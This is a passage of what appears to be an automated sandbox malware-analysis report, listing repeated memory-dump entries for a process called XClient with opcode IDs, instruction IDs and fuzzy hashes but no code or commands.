                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 76e1fecb2ecdb4b728c576206fd97525773e26dda83df7087cd1d643c724719c
                                                                                                      • Instruction ID: 71a59be86d171ad66f51253129345b9b08b63dfcad20bb837ef70900068a9676
                                                                                                      • Opcode Fuzzy Hash: 76e1fecb2ecdb4b728c576206fd97525773e26dda83df7087cd1d643c724719c
                                                                                                      • Instruction Fuzzy Hash: 78419234B00249DFDB19FF78D854AAA77B6FF85210B10C569E445CB265EB349D0ACF50
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0ca9d0018ee4cd12d27429ebb07be0ee974eed7a0e12d368e937664c9e006fdf
                                                                                                      • Instruction ID: 63ff34effee4cdf584efbbc88444a1e1a06f631281aa118d8fed9b6074b881ba
                                                                                                      • Opcode Fuzzy Hash: 0ca9d0018ee4cd12d27429ebb07be0ee974eed7a0e12d368e937664c9e006fdf
                                                                                                      • Instruction Fuzzy Hash: 4D41AC30A00349DFDB05EBB8E854B9DBBB2FF84304F50816AE505EB264EB719C49CB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2548fd143b19c7408801ccc715425f3188d0e3898bf2f31472fc5668feec8dbc
                                                                                                      • Instruction ID: fb0a7c676ad7d4461fdb19e9707a598dba9f6b06f07673c75f4a269d84e6366e
                                                                                                      • Opcode Fuzzy Hash: 2548fd143b19c7408801ccc715425f3188d0e3898bf2f31472fc5668feec8dbc
                                                                                                      • Instruction Fuzzy Hash: C341B034600209DFDB05EF68D854AAE7BF6FFC9201B408569E445CB269EB30AD0ACF90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9007b408534b12c5a854efce33731401597107b644f4e9295cf353e42bac4937
                                                                                                      • Instruction ID: 03202ad85166ad9c1ad8812865ef26e13bf874ca77bf6768568e9a56e547062f
                                                                                                      • Opcode Fuzzy Hash: 9007b408534b12c5a854efce33731401597107b644f4e9295cf353e42bac4937
                                                                                                      • Instruction Fuzzy Hash: 87317075B00205CFCB48EB78D458A6DBBF6AF49705B1545A9E906DF361DB36DC02CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 59be878d7a7be13344a9fbff82b2a3c38eea25ff00e02c845a04456a227392ce
                                                                                                      • Instruction ID: a742946b6150d2b5a73ea5ad19b3cd54dd3e352969dbc4ee836cb27ee735da41
                                                                                                      • Opcode Fuzzy Hash: 59be878d7a7be13344a9fbff82b2a3c38eea25ff00e02c845a04456a227392ce
                                                                                                      • Instruction Fuzzy Hash: ED31BF30A04304CFEB25AFA9D854BBA7BFAEF45314F4884A9E485CB192D739D844CB60
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9c9bcc740af7bf0a03c415673929ad6d5d1e6f82d988e3a9a630e9e68fe482ea
                                                                                                      • Instruction ID: f458796deb3b6ac49de6919bcc33b800d7cdb6b3df31ef9ac90e2e60d7931c9f
                                                                                                      • Opcode Fuzzy Hash: 9c9bcc740af7bf0a03c415673929ad6d5d1e6f82d988e3a9a630e9e68fe482ea
                                                                                                      • Instruction Fuzzy Hash: 4B316A34A00348EFDB05EBB8E494BDDBBB2BF84304F549169E444AB259EB71AC49CB51
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6dd7a482a9ef8d92b1583a1c1787a02b9949dc17edf9c6efa370798f648c7d54
                                                                                                      • Instruction ID: 2b8984b6afc83ea93232258602cbb02264c5465ae94ab11d9c8be710ea083302
                                                                                                      • Opcode Fuzzy Hash: 6dd7a482a9ef8d92b1583a1c1787a02b9949dc17edf9c6efa370798f648c7d54
                                                                                                      • Instruction Fuzzy Hash: DB211A74B00215CFCB88EFB9D49896D77B6AF49615B2045A9D906DB3A1DB35DC02CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9b3540dabb909c6d601142259c031575bfb20e0abf5dbe572f4c921563b9a227
                                                                                                      • Instruction ID: beb8103c224a754cf891466aa0a91a6d77725f69115b4caebc9998f15e51746c
                                                                                                      • Opcode Fuzzy Hash: 9b3540dabb909c6d601142259c031575bfb20e0abf5dbe572f4c921563b9a227
                                                                                                      • Instruction Fuzzy Hash: 7F118270A0831A8FEB14EBB9C4547AE7BF6BF88204F104029D541E7784EF359D04DBA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6a3b284e9f93d2894e2bdf3f10dde56d70d8eb0a0368be53647445e299b5b7a2
                                                                                                      • Instruction ID: 631ff4222d0a4fa5e166a26488a6167b673aa7e5d132b9b717dcb26f908e6e6e
                                                                                                      • Opcode Fuzzy Hash: 6a3b284e9f93d2894e2bdf3f10dde56d70d8eb0a0368be53647445e299b5b7a2
                                                                                                      • Instruction Fuzzy Hash: 1C1104B1E043099FCB65EF79E818B9E7BB6EFC5314F1081AED0549B241DB7118028B91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ac4cbef2ffc2634e9aa3d649f339c6939e459e8ffd1b93f6bea9a848f3dbef86
                                                                                                      • Instruction ID: 785a11bd7fba918dbfb854f29eefdc331916fae688dc5179afc1b699022ba337
                                                                                                      • Opcode Fuzzy Hash: ac4cbef2ffc2634e9aa3d649f339c6939e459e8ffd1b93f6bea9a848f3dbef86
                                                                                                      • Instruction Fuzzy Hash: 5801DB71B00230CFC715AB79E414A1A77EAAF8D71271541F5E405DB335DB31DC018B90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c0ea0ece0f1abe7e94043585a832a5789d63c18dd9e3558c53b57e22f186945b
                                                                                                      • Instruction ID: ea7fc184cc8585a570320736de24ed35a993c9110e5c1d5de3811aace00d7d88
                                                                                                      • Opcode Fuzzy Hash: c0ea0ece0f1abe7e94043585a832a5789d63c18dd9e3558c53b57e22f186945b
                                                                                                      • Instruction Fuzzy Hash: 5101D6343053409BEB197774D82936A3BA9FB82209F1404B9E946C7294EEAA8C45C7A0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 76bbdae79537a2182da9462fbe84f30e2f917b7e2d26a1758921a7117ceecfee
                                                                                                      • Instruction ID: 3ed9ca645c22d2c8d67b4e8ab44b3e17891752dfecde9481cecf0710d775158e
                                                                                                      • Opcode Fuzzy Hash: 76bbdae79537a2182da9462fbe84f30e2f917b7e2d26a1758921a7117ceecfee
                                                                                                      • Instruction Fuzzy Hash: D3F06876B10130CFC754AB7DE45491A77EAAF8DA6231541B9E805DB325DA72EC018B90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b9a9c4479ab66c561d9cf93443c40be182f6c3a743cb9f333f9c1066d852f357
                                                                                                      • Instruction ID: 021bc24b615af970700a31a0f8ab2c3cd4dfa3a16992ba0945cb296f6c3f8dbe
                                                                                                      • Opcode Fuzzy Hash: b9a9c4479ab66c561d9cf93443c40be182f6c3a743cb9f333f9c1066d852f357
                                                                                                      • Instruction Fuzzy Hash: 96F0B43570031487EB5877B8E82832B7A5DBB84644F544578EA06C33C4EFAACC54C7A0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6b1ac6534fb2065a312fd7d0090b2a2bc98c0abe035570577443cc74ad5e9aa6
                                                                                                      • Instruction ID: 095279090c5345ad05ce9cc7a9d0752d93723e0dd8f8112246310706ac0a0ded
                                                                                                      • Opcode Fuzzy Hash: 6b1ac6534fb2065a312fd7d0090b2a2bc98c0abe035570577443cc74ad5e9aa6
                                                                                                      • Instruction Fuzzy Hash: F1F02471D05384EFDB01EBF1AC481ECBFB0EF85205B4480DAD09687A65E7754609CB41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 187944505150c16fb6c9aab47b607eca9c607613934857c75fff6dd6d8d6d0dc
                                                                                                      • Instruction ID: e99ebb49de5444b32f8a86f9cb7fb18877095ef31cfb6011f8eed3c084a69ce7
                                                                                                      • Opcode Fuzzy Hash: 187944505150c16fb6c9aab47b607eca9c607613934857c75fff6dd6d8d6d0dc
                                                                                                      • Instruction Fuzzy Hash: 99F0656261D3C44FDB1727795C112A13FE88B63658B2A44EBE9D5CB263E541DC0CC3E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a05416373a9720d93ee75dca7b2699b1d7bfc2fd983ccbd1e8ed844f37b54df2
                                                                                                      • Instruction ID: 702d366e2b4d113e4af91a0fce87e238d17b679797573e2ecbf758070e2344c1
                                                                                                      • Opcode Fuzzy Hash: a05416373a9720d93ee75dca7b2699b1d7bfc2fd983ccbd1e8ed844f37b54df2
                                                                                                      • Instruction Fuzzy Hash: B4E092313011049FC354EA29E89895FBBAAFBC9661B908539E94BC3359DE3A9C05C7B0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 270ba8278b8844804b9accf3466dee1d4cf79108e6ff19da2d835896183bcc1f
                                                                                                      • Instruction ID: 1ea5aa158cb0ae9eff09eba2b7a1d9811a9355070deb5e4fd2c4a9b505170f99
                                                                                                      • Opcode Fuzzy Hash: 270ba8278b8844804b9accf3466dee1d4cf79108e6ff19da2d835896183bcc1f
                                                                                                      • Instruction Fuzzy Hash: D1F0F4B4640245CFCB14FFB4D158A28BBB1AB88308F1044A8E4069B3A1DB7A9C0ACF00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8a1537ba470d9e4d9d2f8ba6e7f03176e116cb8b4132c8979ceb958792d431da
                                                                                                      • Instruction ID: a6652822c20b6bf17f2e357af33ea16a339749d6185ea3b6da7070b187a8f90f
                                                                                                      • Opcode Fuzzy Hash: 8a1537ba470d9e4d9d2f8ba6e7f03176e116cb8b4132c8979ceb958792d431da
                                                                                                      • Instruction Fuzzy Hash: EFE04F70A00209EFCB01EFA8D91169CBBF5FF95204F5042A5D544D7201E7325E009B81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1874504428.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_1380000_XClient.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: efcb34b1446aa357d7b7fd666f8fe41378d90c23c407127a82c28b40d59b92a0
                                                                                                      • Instruction ID: 8639cd9362075a48c8a1fac609db34e7c5bb5d80f3d5ba254b9fa655f0b7f892
                                                                                                      • Opcode Fuzzy Hash: efcb34b1446aa357d7b7fd666f8fe41378d90c23c407127a82c28b40d59b92a0
                                                                                                      • Instruction Fuzzy Hash: 6DD01730A00209EFCB00EFB8E91559DBBF9EB84204B5081A99949D7205FA326E009B81